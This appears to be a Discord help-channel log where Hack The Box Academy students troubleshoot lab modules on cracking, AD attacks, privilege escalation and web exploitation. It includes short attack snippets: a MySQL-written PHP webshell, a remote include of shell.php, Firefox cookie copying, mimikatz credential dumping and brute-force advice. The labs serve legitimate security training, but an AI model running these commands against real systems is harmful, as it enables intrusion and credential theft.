#modules

#1127297095771099136

Cant access it ? Why is that

Thank anyway

Read and follow #welcome

To get a full access to this discord server you should link your HTB account with your discord account: #welcome message

damn this module takes ages with the community version
https://academy.hackthebox.com/module/110/section/1054

PLEASE HELP: like a few hours to scrape - please edit this section and explain it with ffuf
Burp Intruder is hella trash with the community version

Hi 👋. On the Linux Fundamentals module, in the File System Management section, we have to look for the Size in GiB of the “/dev/sda” disk on Pwnbox. I tried “sudo fdisk -l” and “sudo fdisk -l /dev/sda” but I can’t see the disk. Also tried “lsblk”. Is something wrong with the section or am I missing something?

On the password module, credential stuffing, how long did take you to brute force Kari’s password? (I don’t recall if that is the right name for the MySQL credentials exercise).

HI Guy.. i have ONE module left to complete the Penetration Tester Path... what advice do you have

do it

Try to do the module completely blind. Pop it open, spawn the machine, but do not read anything else in the module - not even the questions. If you can reach domain admin without having to refer to the module at all, you're in relatively good shape for the exam.

Do it blind

No idea what you are doing, but actually it went relatively quickly as far as I can remember

with ffuf it took like 3seconds

with burp i stopped after running for an hour (not even 10% of the list were done at that point)

The module is about web proxies, so ffuf would definitely be the wrong tool

one hour?

yes

like 1 retry every 2 seconds

extremely extremely slow

ZAP is always an option.

Even if it would take 2 seconds for each request, you would be through after 100 seconds 😉

same settings as in the example above

gave me 403 for the 2010 endpoint in burp

Hello,
These days I experience a lot of black screens with xfreerdp in the AD labs.
Is there any workaround?
xfreerdp /u:htb-student /p:'Academy_student_AD!' /v:10.129.62.8
or wihtout the quotes - same results.
I restarted the target and the pawn box. Same problem from my own kali machine.

Press enter?

OMG it works.

thank you so much

Makes me feel stupid.

kills assessment module user 7: "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. "

I am not sure how to authenticate the Domain controller host at 172.16.5.155 via ssh after I logged into the target host. How do I ssh to the address '172.16.5.155' if I don't know the password or username ? This skill assessment is from the 'introduction to the windows command line' module

get good notes

re this: figured out how to move files but for some reason all of the processes started from a non interactive shell die immediately (so I have been unable to upgrade the shell)
not sure if that is by design

If you're in a noninteractive shell, you could try to run a single command to add yourself to the administrators group or manipulate things that way. Figure out ways to do things without having the interactive prompt :)

smart

thanks

https://academy.hackthebox.com/module/110/section/1055
can anyone help me with the with 3rd challenge? i am having problems with encoding the 31 char md5 hash to the cookie

Hey

For this one you might need to try coding a script

I think you can do it with burp as well, just not sure

If you need help, dm me.

Hello, I create CTF challenge content for youtube and a while ago I shared a recent HTB challenge as I didn't know it wasn't allowed. Today, the challenge is already retired and I would like to know if I can re-upload the video to YouTube without violating the platform's rules. I don't know which channel to post the question on, if not here, I apologize. Thanks!

i dont have acces to rockyou.txt

is that a normal think in the hack box

apparently i dont have permision to view file

is there a trick to it guys or just download it from github job ?

If you're on a pwnbox, its there

sudo find / -name rockyou.txt

no idea anyone?

thanks im on the pwnbox in /Seclists/Passwords/Leaked-Databases/

and rok you litteraly has a red x on it

and warning that i don not have permision to open this file

Try chmod?

good idea

it worked for some reaason its not owned by the user its owned only by sudo group

but strange the rock you form the pwnbox found the password for exercise in less than a second

the rock you i downloaded from google spent a good 2 hours and no hit

I'm on the Password Mutations page of the Password Cracking module. The question states to mutate the password list in the resources file and then brute-force the ssh credentials of a named user. There are 94,000 passwords in the mutated list and a few hours of processing time for the brute-force.

Is this the best way forward for the module or am I missing a "Think Outside The Box" opportunity?

Which service did you try to bruteforce?

SSH

is that the only service?

The objective is to brute force the SSH credential to log in. Do other services typically share credentials?

||yeah they do, try another service||

Thank you for your help. 🙏🏻

btw, I think chatgpt can easily write you a script to perform faster ssh bruteforce, paramiko + custom timeouts + threading should be enough

but the module wants you to use certain other tools so you can learn

no worries, dm me if something comes up

faster ssh bruteforce is a bit of an oxymoron

Hey guys, I would like to contact vautia to ask something about the new module Whitebox Attacks. I think we have one issue with the section Authentication Bypass, so I would like to ask him. If someone already solved the module as well please dm! Could someone please help with his contact?↑

if you think theres an issue with the module its best to either contact support or just ask for help here from someone thats finished it

Hey everyone, I'm considering the silver annual plan, but I don't really understand some of the perks listed on the website.. does anyone here have this annual subscription and would be willing to answer some questions in dms please?

Hello, I'm on Linux Privilege Escalation Module Logrotate section,
it tells me to git clone logrotten but when I did git clone https://github.com/whotwagner/logrotten.git it response with fatal: unable to access 'https://github.com/whotwagner/logrotten.git/': Could not resolve host: github.com, anyone know what's wrong?

I found out the git clone is only fail when I was on ssh

Hi

Are you trying to clone that repository into your exercise machine?

yep

I can clone it when not on ssh, but fail on ssh

Machines inside VPN cannot communicate to the outside, they can communicate to other machines within the same network. Clone that repository in your attack mv and transfer it to your target.

Your machine can communicate with the exercise's vm.

Only if you are connected to the VPN...

is it also working if I use windows?

Elaborate

Is your attack system windows

quick question, is there another explanation why it only fail on ssh?

Because boxes don't have internet access

As they literally just said

It's because you can't connect to github.com, it's not a part of your VPN's network. You may want to look this up, it's quite a good topic

This section is quite difficult so my suggestion is just transfer the repository and play around it

so, is there any solution I can do?

Not to my knowledge

May I ask why you want to do that?

because It's on the modules?

I'm on Linux Privilege Escalation - Logrotate

Are you using a local VM for performing attacks or do you have pwnbox?

I'm using pwnbox

They are using pwnbox

Screenshots show

Got it

The instructor would like you to download that repo into your pwnbox

Either way: File Transfer

oh I get it

I was referring to your previous screenshots

ok thx

this?

Like you're not actually reading some of the help given to you

But generally when you're told or given a tool, it will be on your pwnbox/local vm

Generally not going to be on the target system unless specified

thx, problem solved

how long will this command take to show result?
./logrotten -p ./payload /home/htb-student/backups/access.log, been waiting still no result

Did you write an entry in the log file? Otherwise the logfile will never rotate

ok I get it, thx

after the logfile rotate, what should I do next?
I already use watch -n 1 ls -lah /etc/bash_completion.d waiting for the result, do I still have to wait or there's something I must do?

When the logfile rotates, your payload is executed

where?

No idea what is in your payload.
But as soon as the logfile rotates, what you have defined in your payload is executed.

Hi, I encountered the same problem. Did you manage to figure out what to do?

Good morning. I am having some difficulties with the knowledge check in the getting started module. I am on the last part and I am having trouble with privilege escalation after I have established a meterpreter connection.

My progress so far:
I know the username and password to log into /admin/ - This user is not able to log on to ssh though
I have gotten a meterpreter connection on the machine and I can read the user.txt flag
When I try to access root I am not able to. I have tried the following:
I searched for ssh files on the target I can use but have not been able to find any.
I can not run any equivalent to the monitor.sh from earlier in the module as sudo(as far as I can tell)
The website is extremely slow, so any file upload is out of the question it seems
I tried to get priv/getsystem in meterpreter, but no luck.

TLDR: I have shell but I need help getting root.

Any nudge in the right direction would be of great help.

I think I thought „466.344.55.34:4644“ was the whole ip but 4644 in this example was the specific port you should use with eg. -p 4644 and then just 466.344.55.34 as
the ip. Btw those were just example numbers

Hope it helps

Respects to you finding this message

DM me

How is the delivery of the htb certifications, if they are sent to you personally or only online?

Alright thanks

Alright thanks

any help

https://forum.hackthebox.com/t/smtp-question/261523/56?u=nah9009

provide some more details. Which module/section? what have you tried so far?

cant copy non :copy $env:APPDATA\Mozilla\Firefox\Profiles*.default-release\cookies.sqlite .

Need some help for Attacking Common Services - Easy https://academy.hackthebox.com/module/116/section/1466

||I am trying to upload a phpshell via mysql. From http://<IP>/dashboard/phpinfo.php i figured out the webroot to be C:/xampp/htdocs/dashboard/
I proceeded to upload using SELECT "<?php system($_GET['c']);?>" INTO OUTFILE 'C:/xampp/htdocs/dashboard/webshell.php';
And then tried some commands http://<IP>/dashboard/webshell.php?c=id but it didnt work
I can confirm my shell is uploaded because of the error messages when i do not supply the 'c' parameter. I also tried uploading html files and it worked fine too

Also went to the faq.html page and got
PHP:
Executable: \xampp\htdocs and \xampp\cgi-bin
Allowed endings: .php
=> basic package

Tried to read the config files like C:\xampp\php\php.ini with select LOAD_FILE but everything returns NULL||

you have found all the info you need. consider uploading to a different path

If I wanted to look inside any of these modules listed how would I do that?

ok i solved it.. turns out im making a really silly mistake of supplying a linux command instead of a windows one

Hi,
Please, How can Enumerate the "flagDB" database and submit a flag as your answer?
On the Attacking SQL Databases
Attacking Common Services :
https://academy.hackthebox.com/module/116/section/1169

I get the password for mssqlsvc, but login failed

[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'mssqlsvc'.

Try with the username .\\mssqlsvc

Can anybody help me in attacking common applications section attacking splunk i can't get a reverse shell

Im using netcat but doesn't work

does the htb team ever intend to have asia vpns for academy

Hello everyone, just looking for someone to DM real quick. I'm trying to find a Wordpress public exploit in the Pentest basics module but can't seem to find any open services. Thank you.

hi guys im on the brute force skills assesment it says to do it wit hydra but im looking at a 50 h+ brute force attack and anotner one after it. i have a 5700xt in my pc any way i can use that to do the gruntwork ?

my Kali is in a virual environment tho

Working on SAM password attacks module...I'm able to establish the server after making copies of sam.save, security.save and system.save. When I go to use the "move" command per the instructions, I'm getting an "access denied" error...any help would be appreciated! 🙂

can you be a bit clearer on where are you trying to "move" them? Are you trying to "move" them on your local machine?

Hi everyone, good evening. I would need some help on the Attacking SQL Databases module, I am trying to log in with the first user the one that passes the academy but apparently I can't get in. It keeps giving me the error

RROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

I have tried any type of authentication and any tool, even written in the forums but nothing. Has anyone by any chance completed the challenge?

I think for this one you can find the service to exploit by || visiting the website ||

Thanks, for the answer, I just cleared it 15 seconds ago ahah, thanks for the hint though !

via smbserver.py...

Nice one

cause probably access denied is due to the unauthenticated guest transfer, I honestly don't remember the error. Can you paste the impacket-smbserver command between spoiler tags? EDIT: dm you

Im on AD Enumeration & Attacks - Skills Assessment Part II and c**** doesnt want to click my links 😢

which user?

The first one, htdbuser that academy gave to us. I use the mssqlclient and i try every possible combination but nothig. I receive back the same error

What is the index number of the "sudoers" file in the "/etc" directory?
ls -i /etc/sudoers
what is wrong right there?

||sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/||

@fiery berry so the share is established...thought perhaps running cmd as admin would rectify the issue but no

I sent a dm

you should have already a privileged account

Time to start Dante. Let's see how it goes 🙂

are you using the pwnbox?

no

terminal

there is nothing wrong with the command so i thought if it was the pwnbox then refresh it but if you are using vpn it could be something else

1360934 /etc/sudoers

looks good to me too

so whats the prob?

answer is wrong

which module and section is this?

nvm seems like i disconnected from the target

sorry - thanks for your help!!

no worries mate

Does anyone here have issues with the VPN connection to HTB

Because mine is kinda tripping

change servers and/or protocols

Alright let me try that

Hey, i think I got a problem in module SHELLS & PAYLOADS > Antak

I didn't have antak installed so I installed it, and i only get:

/usr/share/nishang/Antak-WebShell/antak.aspx from locate (and find) command

I will try connecting to the academy box

Okay the academy box has it, my bad

are you trying some type of phishing with the ||CT059|| user? if so then it's the wrong path

not exactly fishing I want them to use a shortcut

not the right place for this but feel free to dm if you need help

Am i missing something here? that username isnt in the txt at all. even just looking through the entire thing with cat

wait a second i might be dumb

i think i have a typo in my note for that user but hint still that's wrong type of attack (i'll double check)
Note: just double check, if you are on question 10 that definitely isn't the right path

disregard, my ssh disconnected and i didnt realize

am dumb confirmed

on sqsh or mssqlclient ?

Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'WIN-02\mssqlsvc'.

thank you

hie

problem with VPN connection https://academy.hackthebox.com/module/144/section/1256

• already running vpn file in background
• added adress in etc/hosts

└╼$ nslookup -type=NS inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find inlanefreight.htb: NXDOMAIN

Because inlanefreight.htb isn't a registered domain

You need to do the nslookup on the ip

😮

does anyone know what csrfmiddlewaretoken is? and will it prevent me from brute forcing a login page with hydra

Google is a useful tool

already did

dont get

https://stackoverflow.com/questions/48002861/whats-the-relationship-between-csrfmiddlewaretoken-and-csrftoken/52605270#52605270

In sqsh. From my notes:
sqsh -S 10.129.203.12 -U .\\mssqlsvc -P '<password>' -h

good day friends, i am at Active Directory Enumeration & Attacks, Bleeding Edge Vulnerabilities, i am getting this error at Requesting a TGT Using gettgtpkinit.py

Figured out how to get root with php: https://gtfobins.github.io/gtfobins/php/#sudo

i tried attacking from win host, and this what i get

i was able to solve 1 and 2

but stuck again for hours

clueless

rdp is not up for me in the Dynamic Port Forwarding with SSH and SOCKS Tunneling section of the pivoting tunneling and port forwarding module

ive restarted the pwn box

got a new ip address but still cant connect

section isn't helping with commands

used all commands of that section and found nothing useful

obviously

idk other modules are good imo, but this one is really bad (commands are poorly described compared to others)

been stuck with this for days and learning literally nothing

👍

Im on MSSQL of the Footprinting module and I'm logged in via mssqlclient.py . But none of my SQL commands are working. What am I doing wrong?

I also posted my issue in 'community help'

Hello, I would like to insert the file 'shell.php' present on my machine in the link of the site on the module
https://academy.hackthebox.com/module/23/section/254.

When I put my ip followed by the port and the file name, I get the following error:

Warning: include(http://xxx.xxx.xxx.xxx:xxx/shell.php): failed to open stream: Connection timed out in /var/www/html/index.php on line 47

Warning: include(): Failed opening 'http://xxx.xxx.xxx.xxx:xxx/shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index .php online 47

Notice: Undefined variable: p2 in /var/www/html/index.php on line 48

the xxx.xxx.xxx.xxx:xxx looks a little suspicious

anyone also got the "error: virustotal probably now is blocking our requests" with sublist3r?

Yes, you can ignore that

ahh okay

i wasn't sure, because there was no output

hmm also for other domains nothing is being output

weird

anyone experiencing something similar?

any help please

In "AD Enumeration & Attacks - Skills Assessment Part I" why I can't find t*** password, while I used mimikatz->privilege::debug->sekurlsa::logonpasswords, and also I used 'LaZagne.exe all'

Try to read about AD

Have you done the "introduction to AD" module?

You probably should modify that to remove the username, because that is one of the answers for that section. To answer your question though, mimikatz will give you the answer, but you need to run it as a user with enough permissions, and you may not have access to the machine. Check out PowerShell's ability to run commands on remote machines.

Difficulty of Q2 depends on how you did Q1. If you did it like I did, then you should have a shell on the machine with enough privileges.

Try using that shell to interact with something like PowerShell, and use some of the tools discussed to grab the SPN accounts.

Yes

https://academy.hackthebox.com/module/143/section/1423 gives some good advice for enumerating SPNs on Windows.

AD Enumeration is one of the modules that I personally found very difficult (I rate it as the hardest module). Its the only one I got stuck on for more than 1-2 days. But honestly, all the commands you need to run to find the answers are in the content. You just need to find the right one for the question. 🙂

Is there anyone who has completed the Broken Authentication Skill Assessment that I could bounce a question off of? I have completed it a while back and was reviewing it, and there is one part that I wanted to check with someone else about.

I did it awhile back. What's the question?

It might be a serious spoiler if I drop it in here, is it ok to DM you?

Sure.

Can't promise I'll remember anything, as it was awhile back.

It wont let me send a DM to you unless you add me as a friend, I can drop it in here as well, but it would give away a big part of that assessment

Well, there seems to be an obvious thing to do then :p

There really needs to be an additional list in Discord. "People who are allowed to DM you". 🙂

Can anyone help me with these: (https://academy.hackthebox.com/module/144/section/1256)

• 1 What is the FQDN of the IP address 10.10.34.136?
• 1 What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer.
• 1 Submit the number of all "A" records from all zones as the answer.

Are you running directly from the shell, or something else?

Try running powershell from the shell

What have you tried so far?

Tried using msfvenom and meterpreter?

dig AXFR subdomain.inlanefreight.htb @target ip
nslookup -type=any -query=AXFR inlanefreight.htb 10.129.123.171

Did you run the command without first running
Add-Type -AssemblyName System.IdentityModel

And what did you find out?

Try to add the type first.

solved some questions

but can't find these ips in the list

Enumerate the NameServer better/deeper

You need to verify to post screenshots.

dig AXFR internal.inlanefreight.htb @ns.inlanefreight.htb
dig: couldn't get address for 'ns.inlanefreight.htb': not found

htb is not an official TLD and therefore cannot be resolved

Not much I can help with, unless I can see everything you're doing.

I assume that Discord ate the stars there... you should have the answer right there.

wiht using IP instead of FQDN still the same issue

restarting my vm, one sec

omg this DNS module gave me headaches too

Why?

well you need to pick specific list to brute force, without discord i wouldnt get it in miljn yers

Maybe a zonetransfer is simply not allowed

ok done with this module lmao

pure pain

You mean the footprinting module?

No, DNS is fun

yes, sorry didn mention

hell nah, some things were cool - but there are cooler modules for sure

This footprinting dns module, in a real world scenario, it only would work if an attacker does enumeration and zone transfer from the "trusted" machine? So it would only work if one would gain acces to a machine first?

This section is about understanding that DNS is organized into zones and how they work.

You would hardly attack a DNS server like this

Ok thanx

In a real scenario, you would hardly be able to send 5000 DNS queries to the name server in such a short time. You would be blocked much earlier

idk in my experience nobody cares about dns queries

But if we talk only about the dig axfr command. It would potentially only show results if an attacker is "in the network" first?

DDoS

how short is short

Ive fired off 5k+ queries without issue plenty of times

subbrute irl go brrr

No, Normally only a secondary nameserver can perform a zonetransfer

I think it depends on the target.
But DDoS on NameServer are nasty.

yeah of you actually ddos it ofc

with which format?

its an ipmi hash, review the section notes or google 'john cracking ipmi hash'

thats definitely not correct

review the section notes

then you have to google for john to find the proper format, or follow the hashcat instructions provided

I like using this to look up what format is needed for john -> https://nth.skerritt.blog/

help.

https://academy.hackthebox.com/module/54/section/490
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://94:59?FUZZ=key -fs 986

what's wrong there

are we also supposed to find subomains/directories ?

look here https://academy.hackthebox.com/module/112/section/1069

huh?

Google it

haven't done the module, but google helps 🙃

https://gbe0.com/posts/security/cracking-ipmi-passwords/#john-the-ripper nothing from here works

Idk, but maybe the filter

all responses are 986

sadly there is no hint too

could you quickly check what the url looks like

so are supposed to recursively fuzz too?

task says to do parameter fuzzing on the target

no cracking for today

which section are you on?

https://academy.hackthebox.com/module/54/section/490

You dont have to do a recursive scan

what is wrong here then?

looks right, the two things I dont know is if your filter is correct and that IP looks odd. Is that the actual ip?

no it isn't

and without the filter i just get spammed

everything in that list returns a status code 200 with length of 986

can you screen shot a snip of the output?

cant send pictures here

I think you need to be verified and then you can.

where?

I have a meeting for work I have to jump on, I'll check back when I'm done.

thanks!

i want to go to sleep

ok now

DMED

hello guys, I'm new here, and an average person in the whole field of programming, please tell me where to start, I would like to learn how to quack, hack programs, as well as write cheats / injectors for different games. Tell me, maybe some courses, programming languages , people who can teach in Ukrainian. I will be very grateful in advance!

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

bro dont spam every freaking channel

ok, sorry

thanks

read #rules and #welcome

please help me :(((

all this time no one could told me that output from that payload for ipmi hashes exploit to get that hash would be in directory named true , i cracked it with it in 1 sec .

idk why you like to make fun of students.

Nobody made fun of you

All I said was to either follow the instructions provided in the section or if you wanted to deviate, youd have to google the difference

I never messed around with any directory named true, sounds like you did things a slightly different way than most others, good job.

@grizzled wind

who is making fun

we are all students for life here

with what?

I think the PRTG Network Monitor section in Attacking Common Services needs to be either removed or completely redone. I get different results for my VM as opposed to the pwnbox and neither one actually brings up the correct site when navigating to the provided ip address. In my VM it takes to a Splunk server whereas in the pwnbox it takes me to a Windows server. The provided username and password of prtgadmin:Password123 doesn't work on either.

Without being mean or acting as some kind of gatekeeper, things are only going to get harder from here. It would be a good idea to spend more time learning how the tools work, etc, rather than jumping straight into chat everytime you immediately can't solve something.

That said, without seeing your fuzz command, I couldn't say for certain what your issue is. But there's two things that make this very solvable. First thing: You should be using the FQDN, not the IP address (modify the hosts file to add the given IP address as a reference for admin.academy.htb). Second thing is to know what the size of a failed page is. So run it, and see what the size of the failing parameters are, and then filter them out with fuff filter options.

Do you still need help?

Does anyone know if openvpn has problems with 2019 Kali?

Cant get openvpn to connect, I started the first lesson "Meow"

I just tested it on pwnbox, and it loaded fine. Credentials also worked.

Got it. I took down the erratum post. I just don't understand why I can't get it to work either in my VM or on the pwnbox. It's really odd.

Most likely explanation is possibly config got jammed?

Id try restarting the pwnbox and close any other tabs in other chapters, and then restart the prtg machine

Did you use evil-winrm to get in? I was able to finally sign in using the pwnbox. Just into the PRTG site as an admin with the provided credentials. Evil-wirnm though gives a keep alive disconnected error though.

Try CME

CME just gives me an error that the credentials are incorrect.

Well, either you modified the creds in the script, and the creds are different, or the script didnt fire.

I remember having to try a few times to get it to fire.

I'm going to give up on this for now. I was trying to help someone else out and they can't get it to work either. I'm not really sure where to begin to fix it. Thank you for trying though.

Thank you. I'll take a look at it again later when I have more time. I'm nearly finished with the Attacking Enterprise Networks module.

Okay, I'm stuck. I really don't understand this section of the Attacking Enterprise Networks. It's the Exploitation and Privilege Escalation section. The first step is to navigate to the DNN site at 172.16.8.20 on port 80 and I can see using nmap that port 80 is open. I just can't navigate to it in the browser. It gives an error of problem loading the page. Anyone seen this before and able to assist? I have a feeling that I might be missing something obvious, but it's been a very long day at work and my frustration level is pretty high.

hello everyone, I'm stuck with Password Attack Module/Network Services section

I'm trying to enumerate the WinRM user but, after several intents with different couples SecList dictionaries I can't find it

anyne can share what is the best dictionary to use?

Click the resources link at the top right, there are wordlists there for you to use

ohhhh sorry I dind't saw it, ty.....

don't worry, basically everyone who has done the module has run into this issue

someone know why I get fake negative with wpscan?

and I am using the username and password which I used to log in

oh lol it works without the --password-attack xmlrpc

although xmlrpc is enabled

Hello everyone, I am stuck on the setting up module. I am trying to install ParrotOS and set up the VM but the disc image file wont show up so I can't select it, any idea on what could be going on?

Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. ATTACKING COMMON SERVICES god damn i hate dns

is there anyone able to help me with that module

dm me

i might be able to

Hi, I'm on Linux Privilege Escalation - Sudo
the instruction told me to do make after git clone and cd, but it responds with this instead -sh: 43: make: not found
I tried to skip it and continue to next step and have the same problem when I supposed to run gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c which return -sh: 41: gcc: not found
can anyone help me with this?

you need i think make build essentials

what?

give me a sec youre missing a dependecy

ill find it for you

what is the program you want to install

try this: configure

make

make install

That pass the ticket section in Password Attacks was probably the most valuable thing in that whole module and definitely feels like it belongs in the active directory modules instead

try this too sudo apt install build-essential

can't use sudo

are you doing this on the attack machine or on the target

target

oh

uhhh

i havent done the module yet but i can try along

dont try that technique

try the last one

hey people, I'm stuck with Password Attack Module/Network Services section

any hint how to find the Flag for the 1st question..!!!

I found the user & passwd and, get connected via evil-winrm but {I had to find some info how to use it} and when I wrote "menu" I don't know what else to do....

via xfreerdp I received a cert error message/connection unsuccessful

I tried also via smbclient {CASSIE folder} with no success either....

any hint?

Once you've connected via winrm, you have access to a noninteractive windows shell

so you just run windows commands on the command line

if you don't know how to do that, time to do some research

ok., I typed DIR & nothing happen

screenshot?

I got it...

Did you make it?

Can I DM someone about the shells and payloads skill assessment? Not asking for help, wondering if something is intentional or not. nvm, definitely unintentional but we take those

+++rep @carmine hill
Bro helped me a lot explaining and was very patient with me !! I love this community!!

Anyone please give me a nudge on this osint corporate recon module question "Investigate the website www.inlanefreight.com and find out how much EBIT they recorded for the third quarter of 2020 and submit it as the answer. (Format example: GBP 000,000)"

I would begin by researching what EBIT is and where you can typically find it (for example, on what type of document or report) so you know what you're looking for. Then work the recon. This would be my approach

can i dm you ?

Sorry, no

ok thanks man

Np dude, happy to help

In the website its not in number,
Its worded. like 8 Billion, 10 Million

i too found that but don't know how to convert it to gbp

Hi, I encountered the same problem. did you manage to find out what to do?

What are your settings for the options? What output are you getting after running the exploit? I recall there was a detail that shows afterwards.

Can't remember to be honest.. I got a feeling that when I've tried to run the exploit few times after
, the files did apear on my VM.

I ran this auxiliary(scanner/http/wp_simple_backup_file_read) with RHOSTS as the target IP address and RPORT as the target port specified

i received this output:
+] File saved in: /home/htb-ac-859516/.msf4/loot/20230711064349_default_83.136.250.34_simplebackup.tra_648173.txt
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

and opened the .txt file

but did not find anything useful from there

There's another option that should be set.

I tried both: set TARGETURI /simple-backup and set TARGETURI /root/simple-backup

I received this output for both separately:
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

but was unable to find the relevant file

Read the question again

And the exploit's option descriptions

Finally completed the module Whitebox Attacks!!

Definely it's the hardest module in academy till now, but the effort is well worth it!!

Congratulations for all involved, and especially for the author Vautia, incredible!

Harder than the HTTP modules? 😳
Ouuuu 🙈

I have two more modules to finish, then I'll jump into Whitebox Attacks.

not a dir , after you scan with option output_john_hashformat you get text file named true in the same dir where you was when you start sscan , if you give john that true text he will crack ipmi hashes in 1 second

sorry I am super lost. I tried to set TARGETURI to /index.php/2021/02/11/hello-world/ which was what I got from the webpage, but still did not return anything useful. I also tried to set FILEPATH to /flag.txt but encountered the same output. any hints? thank you so much!

OwO just finished the AD enum & attacks module and it looks like Im hooked now

QAQ

stuck in here

the targeturi is not needed

Just read that one. Its my next module after Injection Attacks. 🙂

got it, thank you so much!

I'll dm you

oh yeah i use the nmap to scan and find the port

thx a lot QAQ

How am I supposed to footprint a service that isnt up on the target?

Hello guys, I have a question about Meterpreter Tunneling & Port Forwarding in the PIVOTING, TUNNELING, AND PORT FORWARDING module
I have connect the reverse shell by meterpreter but I don't get the session ID as below picture:

What makes you sure about that

It didnt come up on my NMap scans but i could connect to it

or

yeh

weird stuff

lol

Which protocol utilizes IPMI

NetBIOS?

Read the chapter once again

ok

NO, its UDP

Lol

aaaa

You're not always going to get the exact thing as examples. Just follow the instructions: where it has you input the "session" is where you put in your session id

also make sure you're doing the right commands to background the session and not close it

Ah

i need help

Just ask your question

i will

someone please explain the difference betwee NAT and Bridged in Vmware

dm you

I am attempting to download the id_rsa file from the Attacking Services - SMB module, but the file doesn't download and appears to get stuck. I'm using the following command: smbmap -H 10.129.232.131 -u jason -p XXXXXXXXXXX --download ".\GGJ\id_rsa"

you can use smbclient, while of course if you want to see how smbmap works I guess it's fine too

Hello, im at the module "Getting started" 'pentesting basics/priviledge escalation'. managed to gain access as user2, but I am unsure how to proceed to escalate my privileges to root. I have explored the root directory and only found flag.txt but I am unable to read it with user2. I am also aware that there is a key and key.pub file in user1 but I am not too sure how to proceed from here. help please, thank you!

I tried smbclient and I'm getting a NT_STATUS_IO_TIMEOUT message. I even increased the threads to 60.

can you paste your smbclient between spoiler tags?

My prompt was right, but I was using a Kali box. I swtiched to the pwnbox and got the flag. Thanks.

There's another approach described in the section that you can use to escalate your privileges.

Absolutely, hahaha. But take your time and do it patiently, it will be fun!!

Go ahead, it will be fun!

Hey guys, a bit stuck with the logrotate lab in linux privilege escalation, I've looked through all the cron jobs, but can't find anything that looked like it was rotating quickly enough to be what we were looking for?

Try appending some data to a logfile that you think could be rotated and see what happens. The box is set up so you don't wait forever for a log to be rotated, so if you add some data, and that data eventually disappears, that's the log you want to use.

but surely theres got to be a better way of going about it than just trying to append to different log files? Like, I tried to create a 'find' script together to show me the 50 most recent files created on the system, if something is rotating, woul that not show up?

happy to be wrong, just trying to think of other ways I can use to make this easier in the future 🙂

I think a find would work

The answer is like this XXX,000,000

Can someone assist with the Privileged access section of AD Enumeration and Attacks module? "What other user in the domain has CanPSRemote rights to a host?"

i did both bloodhound query and powerview query and there is only 1 user in the group and its not the right answer.

Send me a DM if your still stuck

Hi to all! Please HELP! Stuck on third question of Living of the Land module. "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer." Just any ideas how looks this flag? dsquery command print out nothing.

Hello. I can't submit the flag in this 'meow' module in the starting point. It literally says that 'Meow root is already owned'

I have never done that machine before

Read the description of the skills assessment, it gives you some important context.

I deleted it but someone saw it. I just noticed it 😳

@trail leaf thank youuu mate

I just lose two hours trying to craft an upload request -_-

Pretty sure the upload page doesn't have a filter though, so it shouldn't be that much harder even if you don't have context 🤔

@trail leaf maybe. It would be interesting if smn did it like this

Would anyone be able to help me out with the DNS section of the Footprinting module? Really struggling with the question "Identify if its possible to perform a zone transfer and submit the TXT record as the answer"

What exactly do you want to do? What is the problem?
The command seems to be ok so far. But without context I can't help you.

What have you tried and what doesn't work?

respanwed target and added back to hosts

working fine now

Hi, I'm having problems solving the medium lab for Firewall and IDS/IPS Evasion (nmap enumeration). I've tried a ton of different things/scripts/options and I even resorted to looking up two different write ups which show slightly different output to what I'm seeing.

I have to find the target's DNS version, but all I can see is the version being 'NLnet Labs NSD' instead of the htb flag. I even copy/pasted the nmap command from the write ups with my targets IP but I don't see the htb flag as shown in the writeup

I first did a "dig axfr inlanefreight.htb @ip_address" which yielded some subdomains, then I did "dig axfr subdomain.inlanefreight.htb @ip_address" one of them gave me even more subdomains. Did the same thing on those. Then thought I needed the TXT from them so then on all of the subdomains I found I did "dig +short TXT subdomain.inlanefreight.htb @ip_address" but I got nothing from everything.

When you perform a zone transfer, TXT entries are also transferred. A zone transfer with AXFR always transfers the complete zone.

I guess I am not understanding how I am supposed to get the TXT entry that contains the flag...am I not performing the correct commands?

Nevermind...saw the flag staring right at me the whole time

hi guys im on Broken Authentication The Weak Bruteforce protection. im using the script changed it arround and using an ip that i think it should trust but i think the list im using isnt right

could anyone point me in the direction of the list is it the csv from the script or is it another one and we have to eddit the script function to read diferent files ?

can someone explain me why i need to add any subdomains found via vhost-fuzzing to hosts?
i'm mapping hostnames to the target IP, but how does this work:

it helps you resolve the names to ip address especially considering these URLS are on a private network

could i set it as *.academy.htb instead

so i don't need to set every subdomain?

You can try that, but I don’t think wildcard characters work in /etc/hosts

not sure of a wild card working ... try it out but then again other modules dont really share the same domain ... you will come across inlanefreight.htb

can i imagine it like this:
when i try to ping/fuzz/whatever the FQDN needs to mapped to an IP so it knows where to find the address?

and i also add any subdomain in there as the host will remain the same

not sure what you mean but once you add any domain / subdomain to the target ip it will be read off the /etc/host file

yes, but all domains/subdomains have the same host in the case above

that's what i mean

usually you only need to add one host and another subdomain per module but if there is a module that has half a dozen subdoms they just give you the list from the start so you can add them in one go ... the only hassle is everytime you refresh your target you need to update the ip

yes have experienced that too xd

I am sorry, but I don't understand what you mean. The system tells me that I already done the machine when in reality I didn't

I was responding to someone else, and they deleted their message 😅

I don't know how to resolve your issue, but if you have the root flag, and the system says you have it, I think that's fine 🤷‍♂️

